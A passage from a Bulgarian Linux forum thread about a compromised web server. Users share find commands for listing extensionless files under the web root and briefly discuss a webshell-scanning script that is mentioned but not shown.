find /var/www/html/ |grep -v '\.'
Изписването на пълен път до началната папка при този вариант е задължително, тъй като иначе всички файлове биха били изключени от резултата, дори и да не съдържат точка, заради относителния път, който ще се изпише в началото на пътя.

П.П.: Я по-добре с ей такова търсене, че да не изключваш търсене в скрити папки (такива, имената на които започват с точка), а и да махнеш папките от резултата (т.е., да излезе списък само от файлове)
Цитат
find /var/www/html/ -type f -not -name '*.*'
Тук вече ти е позволено да ползваш и относителни пътища, ако искаш.


Титла: Re: Пробив в сигурността на уеб сървър
Публикувано от: mishot в Sep 10, 2012, 11:12
Открих този скрипт, който сканира за потенциален код на webshell(май рови кода за Exploit-и )
Слагам го за всеки, който може да има моя проблем:


Титла: Re: Пробив в сигурността на уеб сървър
Публикувано от: neter в Sep 10, 2012, 11:45
май рови кода за Exploit-и
По-точно, проверява файловете дали съдържат някой от описаните в sploitpattern стрингове. Описаните текущо в скрипта са имената на някои по-известни webshell-ове и някои по-често срещани думички в тях. Със същия успех и сам можеш да пуснеш търсене за тези думички (най-често кракерите не променят нищо, а в останалите случаи най-често почти нищо в webshell-овете, които ползват), но е хубаво, че някой си е поиграл да вкара действието в скрипт. Все пак не се осланяй само на него - той може да послужи само за начална проверка.


Титла: Re: Пробив в сигурността на уеб сървър
Публикувано от: mishot в Sep 10, 2012, 15:29

П.П.: Я по-добре с ей такова търсене, че да не изключваш търсене в скрити папки (такива, имената на които започват с точка), а и да махнеш папките от резултата (т.е., да излезе списък само от файлове)
Цитат
find /var/www/html/ -type f -not -name '*.*'
Тук вече ти е позволено да ползваш и относителни пътища, ако искаш.

Това ми свърши перфектна работа!
Хиляди благодарности!